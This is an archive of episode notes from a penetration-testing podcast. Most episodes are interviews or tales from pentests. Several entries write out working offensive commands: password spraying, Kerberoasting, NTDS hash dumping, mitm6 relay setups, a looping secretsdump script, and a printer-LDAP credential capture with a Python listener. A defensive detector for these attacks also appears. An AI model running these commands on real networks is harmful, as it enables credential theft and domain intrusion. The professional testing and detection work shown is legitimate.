    7MS #556: How to Build a Vulnerable Pentest Lab Jan 20, 2023

    Today's episode is brought to us by our friends at Blumira!

    Today we kick off a series all about building your own vulnerable pentest lab from scratch, specifically:

    • Spinning up a domain controller with a few lines of PowerShell
    • Installing Active Directory Domain Services
    • Setting up an intentionally cruddy password policy
    • Baking in the MS14-025 vulnerability

    P.S. if you're looking for a more automated/push-button solution to get up and going with a lab to play in, check out some of these options:

    • https://github.com/Orange-Cyberdefense/GOAD
    • https://automatedlab.org/en/latest/
    • https://github.com/microsoft/MSLab
    • https://github.com/davidprowe/BadBlood
    • https://github.com/cliffe/secgen
    • https://github.com/WazeHell/vulnerable-AD


    7MS #555: Light Pentest eBook 1.1 Release Jan 13, 2023

    Today we're releasing version 1.1 of our Light Pentest eBook. Changes discussed in today's episode (and shown live in the accompanying YouTube video) include:

    • Some typos and bug fixes
    • A new section on finding systems with unconstrained delegation and exploiting them
    • A new section on finding easily pwnable passwords via password spraying
    • A new section on relaying credentials with MITM6 (be careful using some of its options - read this)
    • New ways (and some words of warning) to dump hashes from Active Directory

    7MS #554: Simple Ways to Test Your SIEM Jan 06, 2023

    Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more context, but here are the essential tools and commands covered:

    Port scanning:
    nmap 10.0.7.0/24 - basic nmap scan
    masscan -p1-65535,U:1-65535 --rate=1000 10.0.7.0/24 -v - scan all 65k+ TCP and UDP ports!

    Password spraying:
    Rubeus.exe spray /password:Winter2022! /outfile:pwned.txt - try to log into all AD accounts one time with Winter2022! as the password, and save any pwned creds to pwned.txt

    Kerberoasting and ASREPRoasting:
    rubeus.exe kerberoast /simple
    rubeus.exe asreproast /nowrap

    Key group membership changes (/domain is required when you run this anywhere other than a domain controller):
    net group "GROUP NAME" user-to-add-to-a-group /add /domain

    Dump Active Directory hashes:
    cme smb IP.OF.THE.DOMAINCONTROLLER -u user -p password --ntds --enabled
    ntdsutil "ac i ntds" "ifm" "create full c:\dc-backup" q q

    SMB share hunting:
    Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\output - SMB enumeration using PowerHuntShares


    7MS #553: The Artificial Intelligence Throat Burn Episode Dec 30, 2022

    Hey friends, today's episode is hosted by an AI from Murf.ai because I suffered a throat injury over the holidays and spent Christmas morning in the emergency room! TLDL: I'm fine, but if you want the (sort of) gory details and an update on my condition after my ENT appointment, check out today's episode. Otherwise, we'll see you next week when our regularly scheduled security content continues in 2023.

    Merry belated Christmas, happy holidays and happiest of new year to you and yours!


    7MS #552: Tales of Pentest Pwnage - Part 45 Dec 24, 2022

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today's tale of pentest pwnage covers some of the following attacks/tools:

    • Teleseer for packet capture visualizations on steroids!
    • Copernic Desktop Search
    • Running Responder as Responder.py -I eth0 -A will analyze traffic but not poison it
    • I like to run mitm6 in one window with mitm6.py -i eth0 -d mydomain.com --no-ra --ignore-nofqdn and then in another window I do ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.the.dc -smb2support --delegate-access > relaysRphun.log - that way I always have a log of everything happening during the mitm6 attack
    • Vast.ai looks to be a cost-effective way to crack hashes in the cloud (haven't tested it myself yet)

    7MS #551: Interview with Matt Warner of Blumira Dec 16, 2022

    Today we welcome our pal Matthew Warner (CTO and co-founder of Blumira) back to the show for a third time (his first appearance was #507 and second was #529).

    I complained to Matt about how so many SIEM/SOC solutions don't catch early warning signs of evil things lurking in customer networks. Specifically, I whined about 7 specific, oft-missed attacks like port scanning, Kerberoasting, ASREPRoasting, password spraying and more. (Shameless self-promotion opportunity: I will be discussing these attacks on an upcoming livestream on December 29).

    Matt dives into each of these attacks and shares some fantastic insights into what they look like from a defensive perspective, and also offers practical strategies and tools for detecting them!

    Note: during the discussion, Matt points out a lot of important Active Directory groups to keep an eye on from a membership point of view. Those groups include:

    • ASAAdmins
    • Account Operators
    • Administrators
    • Backup Operators
    • Cert Publishers
    • Certificate Service DCOM
    • DHCP Administrators
    • Debugger Users
    • DnsAdmins
    • Domain Admins
    • Enterprise Admins
    • Event Log Readers
    • ExchangeAdmins
    • Group Policy Creator Owners
    • Hyper-V Administrators
    • IIS_IUSRS
    • IT Compliance and Security Admins
    • Incoming Forest Trust Builders
    • MacAdmins
    • Network Configuration Operators
    • Schema Admins
    • Server Operators
    • ServerAdmins
    • SourceFireAdmins
    • WinRMRemoteWMIUsers
    • WorkstationAdmins
    • vCenterAdmins
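    The commands in #554 above generate the signals, and the list just above is what Matt says to watch; as an added example (mine, not Blumira's detection logic and not from the podcast), here is a small detector that runs those four checks over a handful of Windows Security events. The events are hand-built dicts with the field names a SIEM would extract from 4771/4625, 4769, 4768 and 4728/4732/4756, not real log lines; the thresholds and window are assumptions to tune for your own environment.

```python
"""Detect password spraying, Kerberoasting, AS-REP roasting and sensitive group
changes from (constructed) Windows Security events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Groups whose membership changes deserve an alert (built-ins plus a few from the
# discussion above); trim or extend for your environment.
SENSITIVE_GROUPS = {
    "Administrators", "Domain Admins", "Enterprise Admins", "Schema Admins",
    "Account Operators", "Backup Operators", "Server Operators", "Cert Publishers",
    "DnsAdmins", "DHCP Administrators", "Group Policy Creator Owners",
    "Hyper-V Administrators", "Incoming Forest Trust Builders",
    "Network Configuration Operators", "Event Log Readers", "WinRMRemoteWMIUsers",
}


def detect(events, window=timedelta(minutes=2), spray_users=5, roast_spns=3):
    """Return alert dicts. Events are sorted by time; each rule fires once per key."""
    alerts = []
    fails = defaultdict(list)    # source IP -> [(time, account)] pre-auth/logon failures
    rc4_tgs = defaultdict(list)  # requesting account -> [(time, spn)] RC4 service tickets
    fired = set()
    for e in sorted(events, key=lambda x: x["time"]):
        eid, now = e["EventID"], e["time"]
        if eid in (4771, 4625):
            # Spray: one source failing against many distinct accounts in a short window.
            src = e["IpAddress"]
            fails[src] = [(t, u) for t, u in fails[src] if now - t <= window]
            fails[src].append((now, e["TargetUserName"]))
            users = {u for _, u in fails[src]}
            if len(users) >= spray_users and ("spray", src) not in fired:
                fired.add(("spray", src))
                alerts.append({"rule": "password_spray", "source": src, "accounts": len(users)})
        elif eid == 4769:
            # Kerberoast: RC4 (0x17) service tickets for user (non-$) SPNs, several in a row.
            svc = e["ServiceName"]
            if e["TicketEncryptionType"].lower() == "0x17" and not svc.endswith("$") \
                    and svc.lower() != "krbtgt":
                who = e["TargetUserName"]
                rc4_tgs[who] = [(t, s) for t, s in rc4_tgs[who] if now - t <= window]
                rc4_tgs[who].append((now, svc))
                spns = sorted({s for _, s in rc4_tgs[who]})
                if len(spns) >= roast_spns and ("roast", who) not in fired:
                    fired.add(("roast", who))
                    alerts.append({"rule": "kerberoast", "account": who, "spns": spns})
        elif eid == 4768 and e["PreAuthType"] == "0":
            # AS-REP roast: a TGT handed out without pre-authentication.
            alerts.append({"rule": "asrep_roast", "account": e["TargetUserName"],
                           "source": e["IpAddress"]})
        elif eid in (4728, 4732, 4756) and e["TargetUserName"] in SENSITIVE_GROUPS:
            # Member added to a security-enabled global/local/universal group we care about.
            alerts.append({"rule": "sensitive_group_add", "group": e["TargetUserName"],
                           "member": e["MemberName"], "by": e["SubjectUserName"]})
    return alerts


# Constructed sample events (not real logs).
T0 = datetime(2023, 1, 6, 9, 0, 0)


def mk(offset_s, eid, **fields):
    return {"time": T0 + timedelta(seconds=offset_s), "EventID": eid, **fields}


SAMPLE_EVENTS = [
    # A Rubeus-style spray: one source, six accounts, one failure each, inside a minute.
    *[mk(i * 10, 4771, TargetUserName=u, IpAddress="10.0.7.50", Status="0x18")
      for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])],
    # Kerberoast: RC4 TGS requests for three user SPNs by jsmith.
    mk(120, 4769, TargetUserName="jsmith@CORP.LOCAL", ServiceName="svc_sql",
       TicketEncryptionType="0x17", IpAddress="10.0.7.50"),
    mk(121, 4769, TargetUserName="jsmith@CORP.LOCAL", ServiceName="svc_web",
       TicketEncryptionType="0x17", IpAddress="10.0.7.50"),
    mk(122, 4769, TargetUserName="jsmith@CORP.LOCAL", ServiceName="svc_backup",
       TicketEncryptionType="0x17", IpAddress="10.0.7.50"),
    # Benign: an AES ticket for a computer account should not count.
    mk(123, 4769, TargetUserName="jsmith@CORP.LOCAL", ServiceName="FS01$",
       TicketEncryptionType="0x12", IpAddress="10.0.7.50"),
    # AS-REP roast: TGT for an account with pre-auth disabled.
    mk(130, 4768, TargetUserName="legacy_svc", PreAuthType="0", IpAddress="10.0.7.50"),
    # Group changes: one sensitive, one not.
    mk(200, 4728, TargetUserName="Domain Admins",
       MemberName="CN=jsmith,CN=Users,DC=corp,DC=local", SubjectUserName="helpdesk1"),
    mk(201, 4728, TargetUserName="Sales",
       MemberName="CN=bob,CN=Users,DC=corp,DC=local", SubjectUserName="helpdesk1"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

    Feed it the events your SIEM already parses and the same four alerts should come out of the #554 test commands; if they do not, you have found the gap Matt and I were complaining about.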

    7MS #550: Tales of Pentest Fail - Part 5 Dec 09, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Hey friends, today's episode is extra special because it's our first episode we've ever done live and with video(!). Will we do it again? Who knows. But anyway, we had a fun time talking about things that have gone not so well during pentesting lately, specifically:

    • Things we keep getting caught doing (and some potential ways to not get caught!)
      • Responder
      • SharpHound
      • CrackMapExec - specifically running -x or -X to enumerate systems
      • PowerHuntShares
    • "FUD sprinklers" - people who cast fear, uncertainty and doubt on your pentest findings
    • A story about the time I took down a domain controller (yikes)

    7MS #549: Interview with Christopher Fielder and Daniel Thanos of Arctic Wolf Dec 02, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Today my friends Christopher Fielder and Daniel Thanos from Arctic Wolf chat with me about what kinds of icky things bad guys/gals are doing to our networks, and how we can arm ourselves with actionable threat intelligence and do something about it!

    P.S. This is Christopher's seventh time on the program. Be sure to check out his first, second, third, fourth, fifth and sixth interviews with 7MS.


    7MS #548: Tales of Pentest Pwnage - Part 44 Nov 25, 2022

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Happy belated Thanksgiving!

    This is not a brag or a flex, but this episode covers a coveted achievement I haven't achieved in my whole life...until now: TDAD: Triple Domain Admin Dance!!!!1111!!!1!1!!!!

    We talk about the fun attack path that led to the TDAD (hint: always check Active Directory user description fields!), as well as a couple quick, non-spoilery reviews of a few movies: V for Vendetta and The Black Phone.


    7MS #547: Tales of Pentest Pwnage - Part 43 Nov 18, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Today we're talking about tales of pentest pwnage - specifically how much fun printers can be to get Active Directory creds. TLDL: get into a printer's admin interface, change its LDAP server address to your Kali box (plain LDAP on 389, not LDAPS, or the bind will be encrypted), run nc -lvp 389 on your Kali box, and then "test" the credentials via the printer interface. The printer sends a simple bind that carries the AD username and password in cleartext, so you can (potentially) capture an Active Directory cred!

    Today we also define an achievement that's fun to unlock called DDAD: Double Domain Admin Dance.
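    As an added example (not from the podcast), here is what the nc trick is really capturing, decoded: a tiny LDAP listener that parses the BER-encoded simple BindRequest (RFC 4511) the printer sends and returns the bind DN and password as clean strings instead of a blob on the netcat screen. The sample bind, the DN and the password are constructed for the demo; listen_once() is the part you would run on the Kali box.

```python
"""Decode the LDAP simple bind a printer sends when you "test" its LDAP settings."""
import socket


# --- minimal BER helpers -----------------------------------------------------
def _ber_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body      # long form: 0x8N + N length bytes


def _tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(payload)) + payload


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, next_pos) for the TLV starting at buf[pos]."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def build_simple_bind(msg_id: int, dn: str, password: str) -> bytes:
    """Encode an LDAPv3 BindRequest with simple auth (used to make test data; msg_id < 128)."""
    bind = (_tlv(0x02, b"\x03")                # version INTEGER 3
            + _tlv(0x04, dn.encode())           # name OCTET STRING
            + _tlv(0x80, password.encode()))    # authentication [0] simple, cleartext
    # LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp [APPLICATION 0] BindRequest }
    return _tlv(0x30, _tlv(0x02, bytes([msg_id])) + _tlv(0x60, bind))


def parse_simple_bind(data: bytes) -> dict:
    """Pull message id, version, bind DN and password out of a BindRequest."""
    tag, msg, _ = _read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, msg_id, pos = _read_tlv(msg, 0)
    tag, body, _ = _read_tlv(msg, pos)
    if tag != 0x60:
        raise ValueError(f"not a BindRequest (tag {tag:#x})")
    _, version, pos = _read_tlv(body, 0)
    _, name, pos = _read_tlv(body, pos)
    auth_tag, auth, _ = _read_tlv(body, pos)
    simple = auth_tag == 0x80   # only [0] simple carries the cleartext password
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "dn": name.decode("utf-8", "replace"),
        "auth": "simple" if simple else f"other (tag {auth_tag:#x})",
        "password": auth.decode("utf-8", "replace") if simple else None,
    }


def listen_once(host: str = "0.0.0.0", port: int = 389) -> tuple:
    """Accept one connection, parse its first message, return (peer_ip, result).

    Binding 389 needs root or CAP_NET_BIND_SERVICE. Nothing is sent back, so the
    printer's "test" reports a failure, but by then the creds are already captured.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(65535)
    return peer[0], parse_simple_bind(data)


# Constructed sample: the bind a printer configured with this DN/password would send.
SAMPLE_BIND = build_simple_bind(
    1, "CN=svc_printer,OU=Service Accounts,DC=corp,DC=local", "Winter2022!")

if __name__ == "__main__":
    print(parse_simple_bind(SAMPLE_BIND))
    # print(listen_once())   # on the Kali box, once the printer points at it
```

    If the printer is set to LDAPS or StartTLS you get a TLS ClientHello instead of a bind, which is why the interface needs to be pointed at plain LDAP first; and if the auth tag is not [0] simple (SASL), there is no cleartext password in the message to capture.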


    7MS #546: Securing Your Mental Health - Part 3 Nov 11, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Today we're talking about securing your mental health! I share some behind-the-scenes info about my own mental health challenges, and share a great tip a counselor gave me for getting into a good headspace before heading into a difficult conversation/situation.


    7MS #545: First Impressions of Snipe-IT Nov 04, 2022

    Today’s episode of the 7 Minute Security podcast is brought to you by Blumira, which provides easy-to-use automated detection and response that can be set up in…well..about 7 minutes. Detect and resolve security threats faster, and prevent breaches. Try it free today at blumira.com/7ms.

    Hey friends, today we're giving you a first impressions look at a free easy asset management tool called Snipe-IT you can use to build your inventory with! Why is this important? Because it's the first critical security control! It might help to see this tool in action, so we invite you to check out our recent Twitch stream where we got it up and running in about 45 minutes.


    7MS #544: Interview with Nato Riley of Blumira Oct 28, 2022

    Today’s episode is brought to us by Blumira, which provides easy to use, automated detection and response that can be setup in…well…about 7 minutes! Detect and resolve security threats faster and prevent breaches. Try it free today at blumira.com/7ms!

    Today we have a really fun interview with Nato Riley of Blumira. He cut his IT/security teeth working for a cell phone company, exorcising malware demons out of workstations, and even building an email-based SIEM. He has had a very cool career path that involves embracing newbness, pushing aside imposter syndrome, and even begging for jobs! I think this interview can best be summed up by a direct quote from Nato:

    "Things absolutely go wrong, and I think that's what deters people from trying. But just because something goes wrong, doesn't mean you're necessarily going to die from it. So why not try?"


    7MS #543: How to Succeed in Business Without Really Crying - Part 12 Oct 21, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    Hey friends! Today we talk about a SoSaaS (Spreadsheet on Steroids as a Service...not a real thing) that is helping 7MinSec be more organized - both from a project standpoint and from an "alert us when important things are due!" standpoint.


    7MS #542: Eating the Security Dog Food - Part 5 Oct 14, 2022

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    In today's episode we talk more about eating the security dog food (following the best practices we preach!). Specifically, we focus on keeping that bloated email inbox a little more lean and mean. There are lots of tools/services to help with this, but we had a blast playing with MailStore (not a sponsor but we'd like them to be:-).


    7MS #541: Tales of Blue Team Bliss - Part 2 Oct 07, 2022

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit SafePass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today we talk about configuring your Active Directory with MFA protection thanks to AuthLite.

    In the tangent department, we give you a short, non-spoilery review of the film Smile.


    7MS #540: Tales of Blue Team Bliss Sep 30, 2022

    Today we're excited to kick off a new series all about blue team bliss - in other words, we're talking about pentest stories where the blue team controls kicked our butt a little bit! Topics include:

    • The ms-DS-MachineAccountQuota value is not an "all or nothing" option! Check out Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Add workstations to domain.

    • We installed LAPS on Twitch last week and it went pretty well! We'll do it again in an upcoming livestream.

    • Defensive security tools that can interrupt the SharpHound collection!

    • EDRs are pretty awesome at catching bad stuff - and going into full "shields up" mode when they're irritated!


    7MS #539: Eating the Security Dog Food - Part 4 Sep 23, 2022

    Today we revisit a series we haven’t touched in a long time all about eating the security dog food. TLDL about this series is I often find myself preaching security best practices, but don’t always follow them as a consultancy. So today we talk about:

    • How the internal 7MS infosec policy development is coming along
    • Why I’m no longer going to be “product agnostic” going forward
    • Some first impressions of a new tool I’m trying called ITGlue (not a sponsor)
    • How to start building a critical asset list - and how it shouldn’t overlook things like domain names and LetsEncrypt certs

    Also, don’t forget we are doing weekly livestreams on security topics!


    7MS #538: First Impressions of Airlock Digital Sep 16, 2022

    Hey friends! Today we're giving you a first impressions episode all about Airlock Digital, an application allowlisting solution. They were kind enough to let us play with it in our lab with the intention of exploring its bells and whistles, so we're excited to report back our findings in podcast form.

    TLDL: we really like this solution! It is easy to deploy (see this YouTube video for a quick walkthrough). Once I had it going in the lab, I tried administering it without reading any of the documentation, and figured out most of the workflows with ease. I just ran into a couple questions that the Airlock folks were great about answering quickly.

    I want to better understand the "Microsoft way" to do application allowlisting - using their standard offering or something like AaronLocker. But several colleagues have told me they had "OMG moments" where a C-level staff member suddenly needed to run something like ringcentral.exe and they weren't able to because of application allowlisting. It then becomes difficult to quickly allow that .exe to run without pushing GPO updates or having someone log in as local admin or something like that. But Airlock has a cool, killer feature to address this need...take a listen to today's program to learn more!


    7MS #537: Tales of Pentest Pwnage - Part 42 Sep 09, 2022

    In today's episode we share some tips we've picked up in the last few weeks of pentesting, with hopes it will save you from at least a few rounds of smashing your face into the keyboard. Tips include:

    • If you find yourself with "owns" rights to a bajillion hosts in BloodHound, this query will give you a nice list of those systems, one system per line:

    cat export-from-bloodhound.json | jq '.nodes[].label' | tr -d '"'

    Then you can scan with nmap to find the "live" hosts:

    nmap -sn -iL targets.txt

    • For resource based constrained delegation attacks, check out this episode of pwnage for some step-by-step instructions.

    • If you have RBCD admin access to victim systems, don't forget that CrackMapExec supports Kerberos! So you can do stuff like:

    cme smb VICTIM-SYSTEM -k --sam
    cme smb VICTIM-SYSTEM -k -M wdigest -o ACTION=enable

    • Take the time to search SMB shares with something like PowerHuntShares. If you have write access in places, drop an SCF file to capture/pass hashes!

    • Looking to privilege escalate while RDP'd into a system? You owe it to yourself to check out KrbRelayUp!

    • Ever find yourself with cracked hashcat passwords that look something like '$HEX[xxxx]'? Check this tweet from mpgn for a great cracking tip!


    7MS #536: Interview with Amanda Berlin of Blumira Sep 02, 2022

    Today we're so excited to welcome Amanda Berlin, Lead Incident Detection Engineer at Blumira, back to the show (did you miss Amanda's first appearance on the show? Check it out here)! You might already be familiar with Amanda's awesome Defensive Security Handbook or her work with the Mental Health Hackers organization. Today we virtually sat down to tackle a variety of topics and questions, including:

    • What if HAFNIUM2 comes out today and only affects 2 specific versions of Exchange? Does Blumira buy every software/hardware thingy out there and have an evil scientist lab where they test out all these different exploits, and then create detections for them?
    • Can an old, out-of-touch security guy like me still find a place at the Vegas hacker conferences (even though I hate lines, heat, crowds and partying)? Spoiler alert: yes.
    • Are security vendors more likely to share their software/hardware security services with a defensive security group like Blumira, rather than pentesters like 7MinSec?
    • Does Amanda think there's a gender bias in the security industry?
    • Besides being aware of it happening, what can we do to cut down the bullying/secure-splaining/d-baggery/etc. in the industry?

    7MS #535: Rage Against the Remediation Aug 27, 2022

    Today's episode covers three remediation-focused topics that kind of grind my gears and/or get me frustrated with myself. I'm curious for your thoughts on these, so reach out via Slack or Twitter and maybe we'll do a future live stream on this topic.

    1. How do you get clients to actually care when we explain the threats on their network that are a literal 10/10 on the CVSS scale?

    2. Password policies - they're not just as easy as "Have a password of X length with Y complexity."

    3. Fixing the various broadcast traffic and protocol issues that give us easy wins with Responder and mitm6 - it's more nuanced than just "Disable LLMNR/NETBIOS/MDNS and shut off IPv6." This article discusses these challenges in more detail.


    7MS #534: Tales of Pentest Pwnage - Part 41 Aug 19, 2022

    Hey friends, today we share the (hopefully) thrilling conclusion of last week's pentest. Here are some key points:

    • If you find you have local admin on a bunch of systems and want to quickly loop through a secretsdump of ALL systems and save the output to a text file, this little hacky script will do it (one target per line in localadmin.txt, in the domain/user@host form -k expects, with a ticket already in KRB5CCNAME; use sudo -E, or no sudo at all, so that variable survives):

    #!/bin/bash
    File="localadmin.txt"
    Lines=$(cat "$File")
    for Line in $Lines
    do
        echo "--- $Line ---" >> dump.txt
        echo "---------------------" >> dump.txt
        sudo -E python3 /opt/impacket/examples/secretsdump.py -k "$Line" >> dump.txt
        echo "---------------------" >> dump.txt
    done

    From those dumps you can definitely try to crack the DCC hashes using a local or cloud cracker - see our series on this topic for some guidance.

    • Got an NTLM hash for a privileged user and want to PS remote into a victim system? You can essentially do a PowerShell login pass-the-hash with evil-winrm!

    • The Brute Ratel crisis monitor is awesome for watching a box and monitoring for people logging in and out of it (perfect for getting ready to strike with lsass dumps!)


    7MS #533: Tales of Pentest Pwnage - Part 40 Aug 12, 2022

    Ok, ok, I know. I almost always say something like "Today is my favorite tale of pentest pwnage." And guess what? Today is my favorite tale of pentest pwnage, and I don't even know how it's going to end yet, so stay tuned to next week's (hopefully) exciting conclusion. For today, though, I've got some pentest tips to hopefully help you in your journeys of pwnage:

    • PowerHuntShares is awesome at finding SMB shares and where you have read/write permissions on them. Note there is a -Threads flag to adjust the intensity of your scan.
    • Are your mitm6 attacks not working properly - even though they look like they should? There might be some LDAP/LDAPS protections (LDAP signing, LDAPS channel binding) in play. Use LdapRelayScan to verify!
    • Are you trying to abuse Active Directory Certificate Services attack ESC1 but things just don't seem to be working? Make sure the cert you are forging is properly representing the user you are trying to spoof by using Get-LdapCurrentUser.ps1. Also look at PassTheCert as another tool to abuse ADCS vulnerabilities.

    Example syntax for LdapCurrentUser:

    Get-LdapCurrentUser -certificate my.pfx -server my.domain.controller:636 -usessl -CertificatePassword admin

    • If you manage to get your hands on an old Active Directory backup, this PowerShell snippet will help you get a list of users from the current domain, sorted by passwordlastset. That way you can quickly find users who haven't changed their password since the AD backup:

    get-aduser -filter * -server victimdomain.local -properties pwdlastset,passwordlastset,enabled | where { $_.Enabled -eq $True} | select-object samaccountname,passwordlastset | sort-object passwordlastset


    7MS #532: Tales of Pentest Pwnage - Part 39 Aug 05, 2022

    Hey friends, wow...we're up to thirty-nine episodes of pwnage? Should we make a cake when we hit the big 4-0?! Anyway, today's TLDL is this:

    If you get a nagging suspicion about something you find during enumeration, make sure to either come back to it later, or exhaust the path right away so you don't miss something! Because I did :-/

    A tip that's been helping me speed along my use of CrackMapExec and other tools is by using Kerberos authentication. You can grab a ticket for your test AD account by using Impacket like so:

    getTGT.py victim.domain/LowPrivUser
    export KRB5CCNAME=LowPrivUser.ccache

    Then in most tools you can pass the cred by doing something like:

    crackmapexec smb DC01 -k

    In my enumeration of this network, I used Certipy to find potential attack paths against Active Directory Certificate Services. Something cool I learned is that Certipy will spit out both a text and json dump so you can import into BloodHound and then pair that data with their custom queries json file for beautiful visual potential pwnage!

    I ran into an issue where my certificate shenanigans resulted in an KDC_ERR_PADATA_TYPE_NOSUPP. I originally gave up on this attack path, only to learn about this awesome PassTheCert tool from this rad blog post! After initially being hesitant to use a tool I'd never heard of, I raised a GitHub issue to calm my nerves and, shortly after, found myself doing a domain admin dance.

    Oh, and although I didn't use it on this specific pentest, coercer is an awesome tool that helps you, ya know, coerce things!


    7MS #531: Interview with Christopher Fielder and Eugene Grant of Arctic Wolf Aug 01, 2022

    Today we're joined by some of our friends at Arctic Wolf - Eugene Grant and Christopher Fielder - to talk about compliance. Now hold on - don't leave yet! I know for many folks, compliance makes them want to bleach their eyeballs. But compliance is super important - especially because it is not the same as being secure. So we discuss the differences between security and compliance, and practical work we can do to actually be more compliant and secure, including:

    • Knowing what you have (assets, installed software, etc.) - Rumble is a cheap/free way to find out!
    • Creating core policies and procedures that you will actually follow
    • Learning about security frameworks that will help you build a security program from scratch
    • Preparing for your first (or next) pentest. Tools like PingCastle and BloodHound can help find hacker low-hanging fruit!
    • Knowing where your crown jewels are - be that data, a database, a key system, etc.
    • Writing critical documentation - especially backup/restore procedures.
    • Forming a security "dream team" to help drive your program
    • Asking the right security maturity questions at your next job interview (so you don't get hired into a dumpster fire!)

    P.S. this is Christopher's sixth time on the program. Be sure to check out his first, second, third, fourth and fifth interviews with 7MS.


    7MS #530: Tales of Pentest Pwnage - Part 38 Jul 22, 2022

    Hey friends, we have another fun tale of pwnage for you today. I loved this one because I got to learn some new tools I hadn't used before, such as:

    • Get-InternalSubnets.ps1 - for getting internal subnets
    • Adalanche for grabbing Active Directory info (similar to SharpHound)

    This tool worked well for me with this syntax:

    adalanche-windows-x64-v2022.5.19.exe collect activedirectory --domain victim.domain --port=389 --tlsmode=NoTLS
    • Copernic Desktop Search for pillaging through shares with Google-like search capabilities!

    • PowerHuntShares is my new favorite tool for enumerating network shares and associated permissions!

    • CeWL for creating awesome wordlists to crack with!

    I don't have a Toyota TRD Pro, but I can't stop watching this reel.


    7MS #529: Interview with Matthew Warner of Blumira Jul 15, 2022

    Today we're featuring a great interview with Matthew Warner, CTO and co-founder of Blumira. You might remember Matt from such podcasts as this one, where Matt gave us a fountain of info on why out-of-the-box Windows logging isn't awesome, and how to get it turned up to 11!

    Today, we talk about a cool report that Blumira put out called 2022 Blumira's State of Detection & Response, and dive into some interesting topics within it, including:

    • How do companies like Blumira (who we rely on to stay on top of threats) keep their teams on top of threats?

    • Why open source detections are a great starting point - but not a magic bullet

    • Consider this "what if" - a C2 beacon lands on your prod file server in the middle of the work day. Do you take it down during a busy time to save/clean the box as much as possible? Or do you hope to be able to wait until the weekend and triage it on a weekend?

    • Why annoying traffic/alerts are still worth having a conversation about. For example, if you RDP out of your environment and into Azure, that might be fine. But what about when you see an RDP connection going out to a Digital Ocean droplet? Should you care? Well, do you use Digital Ocean for legit biz purposes?

    • Data exfiltration - where does it sit on your priority list? How hard is it to monitor/block?

    • Common lateral movement tools/techniques

    • Why honeypots rule!


    7MS #528: Securing Your Family During and After a Disaster - Part 6 Jul 08, 2022

    In today's episode, I try to get us thinking about our extended family's emergency/DR plan. Why? Because I recently had a close family member suffer a health scare, and it brought to light some questions we didn't have all the answers for:

    • Do we have creds to log onto his computer?
    • How about his email accounts?
    • Do we have usernames/passwords for retirement accounts, bank accounts, etc.?
    • For vehicles/ATVs/boats/etc. - do we have documentation about their service records? How about titles?
    • Can we get into his phone to get key info off of text messages and grab phone #s of key contacts?
    • What are his wishes if he were to pass? Do not resuscitate? How is the money getting handled? Cremation vs. burial?
    • Do we have redundancy in this plan, or is it all on paper in a file somewhere?

    7MS #527: First Impressions of Purple Knight Jul 01, 2022

    In today's episode we talk about Purple Knight, a free tool to help assess your organization's Active Directory security. I stuck Purple Knight in our Light Pentest LITE pentest training lab and did an informal compare-and-contrast of its detection capabilities versus PingCastle, which we talked about in depth in episode #489.


    7MS #526: Tales of Pentest Pwnage - Part 37 Jun 24, 2022

    Today's another fun tale of pentest pwnage - specifically focused on cracking a hash type I'd never paid much attention to before: cached domain credentials. I also learned that you can at least partially protect against this type of hash being captured by checking out this article, which has you set the following setting in GPO:

    • Under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options set Interactive logon: Number of previous logons to cache to 0. Be careful, as you will have login problems if a domain controller is not immediately accessible!

